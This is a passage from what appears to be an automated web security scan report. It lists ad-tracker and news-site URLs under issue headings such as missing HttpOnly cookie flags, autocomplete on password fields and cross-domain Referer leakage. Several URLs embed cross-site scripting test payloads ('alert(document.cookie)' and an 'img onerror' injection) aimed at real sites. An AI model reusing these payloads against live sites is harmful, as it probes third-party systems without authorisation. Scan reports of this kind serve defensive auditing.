12.97. http://gather.us.intellitxt.com/intellitxt/front.asp

12.98. http://geek.us.intellitxt.com/intellitxt/front.asp

12.99. http://i.simpli.fi/dpx.js

12.100. http://i.w55c.net/ping_match.gif

12.101. http://ib.adnxs.com/ab

12.102. http://ib.adnxs.com/getuid

12.103. http://ib.adnxs.com/if

12.104. http://ib.adnxs.com/mapuid

12.105. http://ib.adnxs.com/pxj

12.106. http://ib.adnxs.com/seg

12.107. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

12.108. http://idcs.interclick.com/Segment.aspx

12.109. http://idpix.media6degrees.com/orbserv/hbpix

12.110. http://image2.pubmatic.com/AdServer/Pug

12.111. http://imp.fetchback.com/serve/fb/adtag.js

12.112. http://imp.fetchback.com/serve/fb/imp

12.113. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

12.114. http://knowyourmobile.uk.intellitxt.com/al.asp

12.115. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp

12.116. http://knowyourmobile.uk.intellitxt.com/v4/init

12.117. http://l.sharethis.com/pview

12.118. http://leadback.advertising.com/adcedge/lb

12.119. http://load.exelator.com/load/

12.120. http://loadm.exelator.com/load/

12.121. http://m.adnxs.com/msftcookiehandler

12.122. http://map.media6degrees.com/orbserv/hbjs

12.123. http://map.media6degrees.com/orbserv/hbpix

12.124. http://media.fastclick.net/w/tre

12.125. http://metrics.philly.com/b/ss/phillycom/1/H.17/s66140788192520

12.126. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047

12.127. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

12.128. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js

12.129. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

12.130. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.js

12.131. http://optimized-by.rubiconproject.com/a/dk.js

12.132. http://osmdcs.interclick.com/pixelChecked.aspx

12.133. http://p.brilig.com/contact/bct

12.134. http://pc2.yumenetworks.com/dynamic_btx/115_89795

12.135. http://ping.crowdscience.com/ping.js

12.136. http://pix04.revsci.net/J05531/b3/0/3/0902121/684510010.js

12.137. http://pix04.revsci.net/J09847/b3/0/3/0902121/181431347.js

12.138. http://pix04.revsci.net/J09847/b3/0/3/0902121/629948657.js

12.139. http://pix04.revsci.net/J09847/b3/0/3/0902121/64913653.js

12.140. http://pix04.revsci.net/J09847/b3/0/3/0902121/700534142.js

12.141. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.142. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.143. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.144. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.145. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.146. http://pixel.intellitxt.com/pixel.jsp

12.147. http://pixel.quantserve.com/api/segments.json

12.148. http://pixel.quantserve.com/pixel

12.149. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

12.150. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

12.151. http://pixel.rubiconproject.com/tap.php

12.152. http://pixel.rubiconproject.com/tap.php

12.153. http://pts.eyewonder.com/ewr

12.154. http://r.openx.net/set

12.155. http://r.turn.com/r/bd

12.156. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

12.157. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/8Ac90

12.158. http://r.turn.com/server/pixel.htm

12.159. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=37860280/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.160. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=82264378/hr=9/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fphilly%252Fnews%252Fnation_world%252F121548659.html%253Fef135%252527%25253balert%2528document.cookie%2529%252F%252F4b169261d24%253D1

12.161. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=93300171/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.162. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=1219384/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.163. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=18662554/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.164. http://segment-pixel.invitemedia.com/pixel

12.165. http://segments.adap.tv/data/

12.166. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544154

12.167. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544431

12.168. http://slashphone.us.intellitxt.com/intellitxt/front.asp

12.169. http://slashphone.us.intellitxt.com/v4/init

12.170. http://sync.mathtag.com/sync/img

12.171. http://syndication.mmismm.com/tntwo.php

12.172. http://t.invitemedia.com/track_imp

12.173. http://tacoda.at.atwola.com/rtx/r.js

12.174. http://tag.contextweb.com/TagPublish/getad.aspx

12.175. http://tag.contextweb.com/TagPublish/getad.aspx

12.176. http://tag.contextweb.com/TagPublish/getjs.aspx

12.177. http://tags.bluekai.com/site/2554

12.178. http://tags.bluekai.com/site/3200

12.179. http://tags.bluekai.com/site/3358

12.180. http://tags.bluekai.com/site/353

12.181. http://tags.bluekai.com/site/3561

12.182. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js

12.183. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html

12.184. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ru/d3d3LmFtY29ubWFnLmNvbQ==/1590479807/v/576462396568677351/ac/781370/b/276176/c/474250/view.gif

12.185. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

12.186. http://tracking.skyword.com/tracker.gif

12.187. http://trgc.opt.fimserve.com/fp.gif

12.188. http://trgca.opt.fimserve.com/fp.gif

12.189. http://va.px.invitemedia.com/adnxs_imp

12.190. http://va.px.invitemedia.com/goog_imp

12.191. http://www.facebook.com/brandlift.php

12.192. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce

12.193. http://www.knowyourmobile.com/auth/status.php

12.194. http://www.youtube.com/embed/Iev7TKsXoHo

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://adv.netshelter.net/advlogging/impression.php

13.3. http://api.adsme.com/api/js/rss/adsme.js

13.4. http://api.joliprint.com/api/img/paidcontent.org/adsme_btn_default.png

13.5. http://api.joliprint.com/res/joliprint/img/buttons/default/joliprint_btn_blank.gif

13.6. http://chat.livechatinc.net/licence/1051282/script.cgi

13.7. http://contentnext.disqus.com/thread.js

13.8. http://dg.specificclick.net/

13.9. http://event.adxpose.com/event.flow

13.10. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs

13.11. http://id.expressnightout.com/identity/public/visitor.json

13.12. http://id.slate.com/identity/public/visitor.json

13.13. http://id.theroot.com/identity/public/visitor.json

13.14. http://id.trove.com/identity/public/visitor.json

13.15. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

13.16. http://map.media6degrees.com/orbserv/hbjs

13.17. http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/

13.18. http://politics.gather.com/viewArticle.action

13.19. http://probitaspartners.com/

13.20. http://s.clickability.com/s

13.21. http://slashgeardotcom.disqus.com/thread.js

13.22. http://t.mookie1.com/t/v1/imp

13.23. http://tracking.skyword.com/tracker.gif

13.24. http://ttwbs.channelintelligence.com/

13.25. http://www.amconmag.com/favicon.ico

13.26. http://www.androidcentral.com/android-central-google-io-2011

13.27. http://www.gather.com/6360d%3Cimg%20src%3da%20onerror%3dalert(1)%3E1b6979d15ce

13.28. http://www.ricksantorum.com/

13.29. http://www.smartphoneexperts.com/

13.30. http://www.symbiosting.com/LogicBuy/geek/content-syndicate.php

13.31. http://www.tlsubmit.com/checkout/signup.php

13.32. http://a.tribalfusion.com/displayAd.js

13.33. http://a.tribalfusion.com/j.ad

13.34. http://a1.interclick.com/getInPageJSProcess.aspx

13.35. http://a1.interclick.com/getInPageJSProcess.aspx

13.36. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

13.37. http://action.mathtag.com/mm/rtb/TREE/1101A0/imp

13.38. http://ad.afy11.net/ad

13.39. http://ad.amgdgt.com/ads/

13.40. http://ad.bnmla.com/serve

13.41. http://ad.media6degrees.com/adserv/cs

13.42. http://ad.media6degrees.com/adserv/csst

13.43. http://ad.trafficmp.com/a/bpix

13.44. http://ad.trafficmp.com/a/bpix

13.45. http://ad.trafficmp.com/a/js

13.46. http://ad.turn.com/server/ads.js

13.47. http://ad.turn.com/server/pixel.htm

13.48. http://ad.yieldmanager.com/imp

13.49. http://ad.yieldmanager.com/pixel

13.50. http://ad.yieldmanager.com/pixel

13.51. http://admeld.lucidmedia.com/clicksense/admeld/match

13.52. http://ads.adbrite.com/adserver/behavioral-data/8203

13.53. http://ads.adbrite.com/adserver/vdi/684339

13.54. http://ads.adbrite.com/adserver/vdi/742697

13.55. http://ads.adbrite.com/adserver/vdi/762701

13.56. http://ads.adbrite.com/adserver/vdi/762701

13.57. http://ads.pointroll.com/PortalServe/

13.58. http://ads.revsci.net/adserver/ako

13.59. http://ads.revsci.net/adserver/ako

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.revsci.net/adserver/ako

13.62. http://ads.revsci.net/adserver/ako

13.63. http://ads.revsci.net/adserver/ako

13.64. http://ads.revsci.net/adserver/ako

13.65. http://ads.revsci.net/adserver/ako

13.66. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

13.67. http://ads.specificmedia.com/serve/v=5

13.68. http://ads2.adbrite.com/v0/ad

13.69. http://adsfac.us/ag.asp

13.70. http://adsfac.us/ag.asp

13.71. http://adsfac.us/ag.asp

13.72. http://adv.netshelter.net/context_keywords/k_log.php

13.73. http://afe.specificclick.net/

13.74. http://ak1.abmr.net/is/tag.admeld.com

13.75. http://ak1.abmr.net/is/tag.contextweb.com

13.76. http://altfarm.mediaplex.com/ad/bn/17550-128038-2754-3

13.77. http://altfarm.mediaplex.com/ad/fm/13305-124472-22136-1

13.78. http://amch.questionmarket.com/adsc/d887938/36/500004878102/adscout.php

13.79. http://api.bizographics.com/v1/profile.redirect

13.80. http://api.twitter.com/1/statuses/user_timeline.json

13.81. http://api.viglink.com/api/ping

13.82. http://application.knowyourmobile.com/images/blue-background-15.png

13.83. http://application.knowyourmobile.com/images/dennis_color_logo_70.gif

13.84. http://application.knowyourmobile.com/images/knowyourmobile.ico

13.85. http://application.knowyourmobile.com/images/newkymheaderbackdrop_248.gif

13.86. http://application.knowyourmobile.com/images/tag-bg.gif

13.87. http://application.knowyourmobile.com/phones4u/images/300x400xhead.jpg

13.88. http://application.knowyourmobile.com/phones4u/images/blackberry300banner.jpg

13.89. http://application.knowyourmobile.com/phones4u/images/nav_menu.png

13.90. http://application.knowyourmobile.com/phones4u/mobilev3.css

13.91. http://ar.voicefive.com/b/wc_beacon.pli

13.92. http://ar.voicefive.com/bmx3/broker.pli

13.93. http://ar.voicefive.com/bmx3/broker.pli

13.94. http://as.casalemedia.com/j

13.95. http://as.casalemedia.com/j

13.96. http://as.casalemedia.com/s

13.97. http://b.scorecardresearch.com/b

13.98. http://b.scorecardresearch.com/p

13.99. http://b.scorecardresearch.com/r

13.100. http://b.voicefive.com/b

13.101. http://bcp.crwdcntrl.net/4/c=368|rand=317175907|genp=na

13.102. http://bcp.crwdcntrl.net/4/c=402%7Crand=271498847%7Cpv=y%7Casync=y%7Crt=ifr

13.103. http://bcp.crwdcntrl.net/4/c=402|rand=214441500|pv=y|async=y|rt=ifr

13.104. http://bcp.crwdcntrl.net/4/c=402|rand=286689202|pv=y|async=y|rt=ifr

13.105. http://bcp.crwdcntrl.net/4/c=402|rand=300411654|pv=y|async=y|rt=ifr

13.106. http://bcp.crwdcntrl.net/4/c=402|rand=344848627|pv=y|async=y|rt=ifr

13.107. http://bcp.crwdcntrl.net/4/c=402|rand=690730866|pv=y|async=y|rt=ifr

13.108. http://bcp.crwdcntrl.net/4/c=402|rand=827443052|pv=y|async=y|rt=ifr

13.109. http://bcp.crwdcntrl.net/4/c=402|rand=908408442|pv=y|async=y|rt=ifr

13.110. http://bh.contextweb.com/bh/rtset

13.111. http://bid.openx.net/json

13.112. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.113. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.114. http://bstats.adbrite.com/adserver/behavioral-data/0

13.115. http://bstats.adbrite.com/click/bstats.gif

13.116. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

13.117. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

13.118. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

13.119. http://c7.zedo.com/utils/ecSet.js

13.120. http://cas.criteo.com/delivery/admeld_map

13.121. http://cas.criteo.com/delivery/ajs.php

13.122. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6

13.123. http://cms.ad.yieldmanager.net/v1/cms

13.124. http://cms.quantserve.com/dpixel

13.125. http://contextweb-match.dotomi.com/

13.126. http://cw-m.d.chango.com/m/cw

13.127. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3658195966029417970

13.128. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775/mchpid/4/url/

13.129. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970

13.130. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970/mchpid/4/url/

13.131. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3658195966029417970

13.132. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3658195966029417970

13.133. http://d.tradex.openx.com/afr.php

13.134. http://d.tradex.openx.com/lg.php

13.135. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

13.136. http://data.adsrvr.org/map/cookie/contextweb

13.137. http://data.cmcore.com/imp

13.138. http://digg.com/tools/services

13.139. http://dis.ny.us.criteo.com/dis/dis.aspx

13.140. http://dpm.demdex.net/ibs:dpid=269&dpuuid=4dc0222e-3ec1-3315-901d-9f5b34470a53&ddsuuid=07682087270591542282216767355449152816

13.141. http://forum.androidcentral.com/external.php

13.142. http://g-pixel.invitemedia.com/gmatcher

13.143. http://gather.us.intellitxt.com/intellitxt/front.asp

13.144. http://geek.us.intellitxt.com/intellitxt/front.asp

13.145. http://i.simpli.fi/dpx.js

13.146. http://i.w55c.net/ping_match.gif

13.147. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

13.148. http://idcs.interclick.com/Segment.aspx

13.149. http://idpix.media6degrees.com/orbserv/hbpix

13.150. http://image2.pubmatic.com/AdServer/Pug

13.151. http://imp.fetchback.com/serve/fb/adtag.js

13.152. http://imp.fetchback.com/serve/fb/imp

13.153. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

13.154. http://knowyourmobile.uk.intellitxt.com/al.asp

13.155. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp

13.156. http://knowyourmobile.uk.intellitxt.com/v4/init

13.157. http://l.betrad.com/ct/0_0_0_0_0_456/us/0/1/0/0/0/0/1/242/273/0/pixel.gif

13.158. http://l.betrad.com/ct/0_0_0_0_0_632/us/0/1/0/0/0/0/16/242/111/0/pixel.gif

13.159. http://l.betrad.com/pub/p.gif

13.160. http://l.sharethis.com/pview

13.161. http://leadback.advertising.com/adcedge/lb

13.162. http://load.exelator.com/load/

13.163. http://loadm.exelator.com/load/

13.164. http://map.media6degrees.com/orbserv/hbpix

13.165. http://media.fastclick.net/w/tre

13.166. http://metrics.philly.com/b/ss/phillycom/1/H.17/s66140788192520

13.167. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047

13.168. http://moconews.net/embeds/sub_menu/

13.169. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

13.170. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js

13.171. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

13.172. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.js

13.173. http://optimized-by.rubiconproject.com/a/dk.js

13.174. http://osmdcs.interclick.com/pixelChecked.aspx

13.175. http://p.brilig.com/contact/bct

13.176. http://paidcontent.org/embeds/member_variables/

13.177. http://pc2.yumenetworks.com/dynamic_btx/115_89795

13.178. http://ping.crowdscience.com/ping.js

13.179. http://pix04.revsci.net/J05531/b3/0/3/0902121/684510010.js

13.180. http://pix04.revsci.net/J09847/b3/0/3/0902121/181431347.js

13.181. http://pix04.revsci.net/J09847/b3/0/3/0902121/629948657.js

13.182. http://pix04.revsci.net/J09847/b3/0/3/0902121/64913653.js

13.183. http://pix04.revsci.net/J09847/b3/0/3/0902121/700534142.js

13.184. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.185. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.186. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.187. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.188. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.189. http://pixel.intellitxt.com/pixel.jsp

13.190. http://pixel.quantserve.com/api/segments.json

13.191. http://pixel.quantserve.com/pixel

13.192. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

13.193. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

13.194. http://pixel.rubiconproject.com/tap.php

13.195. http://pixel.rubiconproject.com/tap.php

13.196. http://pts.eyewonder.com/ewr

13.197. http://q1.checkm8.com/adam/detect

13.198. http://q1.checkm8.com/adam/detected

13.199. http://r.openx.net/set

13.200. http://r.turn.com/r/bd

13.201. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

13.202. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/8Ac90

13.203. http://r.turn.com/server/pixel.htm

13.204. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=37860280/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.205. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=82264378/hr=9/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fphilly%252Fnews%252Fnation_world%252F121548659.html%253Fef135%252527%25253balert%2528document.cookie%2529%252F%252F4b169261d24%253D1

13.206. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=93300171/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.207. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=1219384/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.208. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=18662554/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.209. http://ricksantorum.com/explore/

13.210. http://roia.biz/im/v/2sgjvq1BAAGUxkMAAAsDQgAArjg-A/p

13.211. http://roia.biz/im/v/nW08vq1BAAGUxkMAAAsDQgAArj4-A/p

13.212. http://s26.sitemeter.com/js/counter.asp

13.213. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php

13.214. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php

13.215. https://secure.smartphoneexperts.com/

13.216. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

13.217. http://segment-pixel.invitemedia.com/pixel

13.218. http://segments.adap.tv/data/

13.219. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544154

13.220. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544431

13.221. http://slashphone.us.intellitxt.com/intellitxt/front.asp

13.222. http://slashphone.us.intellitxt.com/v4/init

13.223. http://store.androidcentral.com/

13.224. https://support.ccbill.com/

13.225. http://sync.mathtag.com/sync/img

13.226. http://syndication.mmismm.com/tntwo.php

13.227. http://t.invitemedia.com/track_imp

13.228. http://tacoda.at.atwola.com/rtx/r.js

13.229. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

13.230. http://tag.contextweb.com/TagPublish/getad.aspx

13.231. http://tag.contextweb.com/TagPublish/getad.aspx

13.232. http://tag.contextweb.com/TagPublish/getjs.aspx

13.233. http://tags.bluekai.com/site/2554

13.234. http://tags.bluekai.com/site/3200

13.235. http://tags.bluekai.com/site/3358

13.236. http://tags.bluekai.com/site/353

13.237. http://tags.bluekai.com/site/3561

13.238. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js

13.239. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html

13.240. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html

13.241. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ru/d3d3LmFtY29ubWFnLmNvbQ==/1590479807/v/576462396568677351/ac/781370/b/276176/c/474250/view.gif

13.242. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

13.243. http://trgc.opt.fimserve.com/fp.gif

13.244. http://trgca.opt.fimserve.com/fp.gif

13.245. http://ultraedit.app7.hubspot.com/salog.js.aspx

13.246. http://va.px.invitemedia.com/adnxs_imp

13.247. http://va.px.invitemedia.com/goog_imp

13.248. http://weathergang.washingtonpost.com/rest/conditions/20001j

13.249. http://www.facebook.com/brandlift.php

13.250. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce

13.251. http://www.knowyourmobile.com/auth/status.php

13.252. http://www.perfumania.com/wcsstore/PerfumaniaSAS/upload/images/products/PRFM-193531.jpg

13.253. http://www.ultraedit.com/updates/ultracompare/ucupdate.html

13.254. http://www.ultraedit.com/updates/ultracompare/ucupdates2

13.255. http://www.youtube.com/embed/Iev7TKsXoHo

14. Password field with autocomplete enabled

14.1. http://www.gather.com/login.action

14.2. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

14.3. http://www.philly.com/philly/news/nation_world/121548659.html

14.4. http://www.philly.com/s

14.5. http://www.tlsubmit.com/affiliate_signup.html

14.6. http://www.tlsubmit.com/checkout/member.php

15. Source code disclosure

15.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

15.2. http://www.surveygizmo.com/s3/polljs/539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H/

16. Referer-dependent response

16.1. http://ad.doubleclick.net/N6496/adj/gather.com/

16.2. http://ads.adbrite.com/adserver/behavioral-data/8203

16.3. http://ads.adbrite.com/adserver/vdi/742697

16.4. http://ads.adbrite.com/adserver/vdi/762701

16.5. http://bstats.adbrite.com/click/bstats.gif

16.6. http://cdn.shoutlet.com/service/shoutletshare/worker

16.7. http://d.tradex.openx.com/afr.php

16.8. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs

16.9. http://philly.badgeville.com/api/cGhpbGx5QGJhZGdldmlsbGUuY29t/widgets/comments

16.10. http://www.facebook.com/plugins/activity.php

16.11. http://www.facebook.com/plugins/like.php

16.12. http://www.facebook.com/plugins/likebox.php

16.13. http://www.youtube.com/embed/Iev7TKsXoHo

17. Cross-domain POST

17.1. http://ricksantorum.com/explore/

17.2. http://store.androidcentral.com/cart.htm

17.3. http://www.ricksantorum.com/

17.4. http://www.ricksantorum.com/

18. Cross-domain Referer leakage

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.amgdgt.com/ads/

18.4. http://ad.bnmla.com/serve

18.5. http://ad.bnmla.com/serve

18.6. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.7. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2

18.8. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.9. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.10. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.11. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.12. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.13. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.14. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.15. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.16. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.17. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.18. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

18.19. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3

18.20. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

18.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.20

18.22. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2

18.23. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6

18.24. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10

18.25. http://ad.doubleclick.net/adi/huffpost.politics/news

18.26. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech

18.27. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

18.28. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

18.29. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

18.30. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

